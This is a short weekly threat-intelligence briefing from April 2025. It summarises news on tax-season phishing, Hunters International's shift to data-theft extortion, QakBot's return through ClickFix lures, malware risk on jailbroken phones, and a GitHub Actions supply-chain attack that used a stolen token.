Threat Briefing: April 4, 2025

It’s that time of year again—tax season. As people gather documents and some receive notices from the IRS, cybercriminals are actively looking to exploit the situation. Tax season presents a prime opportunity for threat actors, who often use major events to fuel their malicious campaigns.

This week, new details emerged about a well-known ransomware group shifting tactics. Instead of encrypting data, they’re now focusing solely on exfiltrating sensitive information. Meanwhile, more threat actors are jumping on the ClickFix campaign trend—including the group behind QakBot, which seems to have reemerged after a 2023 disruption to its infrastructure.

ClickFix campaigns typically trick users into executing PowerShell commands, which then install malware on their systems. As tax season heats up, so does cybercriminal activity—so being vigilant is more critical than ever.

• • Tax-Themed Phishing Attacks Delivering Malware – Cybercriminals are taking advantage of tax season by launching phishing campaigns that impersonate official tax-related communications. These fraudulent emails are designed to trick recipients into disclosing sensitive information or unknowingly installing malware. Microsoft has issued a warning urging individuals and organizations to stay alert and carefully verify the legitimacy of any tax-related messages they receive. The Hacker News
  • Hunters International Ransomware Gang Rebrands and Shifts Focus – The cybercrime group known as Hunters International is moving away from traditional ransomware attacks and is now focusing exclusively on data theft and extortion. Previously linked to ransomware incidents impacting around 300 organizations—primarily in North America—the group has significantly evolved its tactics. In August 2024, Hunters International abandoned ransomware notes and began directly contacting CEOs and senior executives of victim organizations to negotiate payments. By January 2025, the group launched a new initiative called World Leaks, aimed at carrying out exfiltration-only attacks. However, the project ran into infrastructure challenges, leading to a temporary pause in its operations. SecurityWeek
  • QakBot Resurfaces with Social Media Lures and ClickFix Deployment Tactics – Following a global law enforcement takedown in 2023, the QakBot banking Trojan has resurfaced with a revamped approach. Threat actors are now exploiting social media platforms like LinkedIn to distribute malicious links, directing users to fake websites that present bogus CAPTCHA challenges. Once engaged, these sites initiate the download of malware onto the victim’s system using the ClickFix technique. Recent campaigns have targeted sectors including healthcare, construction, and government—highlighting the growing sophistication of social engineering tactics and the need for heightened awareness. Dark Reading
  • Jailbroken Devices Pose Elevated Malware Risk, Increasing Threat to Corporate Environments – Jailbreaking or rooting mobile devices—often done to enable customization or bypass restrictions—dramatically increases security vulnerabilities. Recent studies reveal that these compromised devices are 3.5 times more likely to be infected with malware and face a staggering 250-fold increase in the risk of total device compromise. For organizations, this trend amplifies the risks associated with Bring Your Own Device (BYOD) policies, underscoring the urgent need for strong mobile security controls and user awareness. Dark Reading
  • Compromised Personal Access Token Triggers GitHub Actions Supply Chain Attack – A compromised Personal Access Token (PAT) associated with the SpotBugs project, initially exposed via a malicious pull request in December 2024, was leveraged in March 2025 to carry out a supply chain attack on GitHub Actions. Threat actors used the stolen token to manipulate GitHub Actions workflows, resulting in the exposure of CI/CD secrets across multiple repositories. This incident underscores the security challenges in open-source ecosystems and reinforces the urgent need for robust access controls and secure development practices. SecurityWeek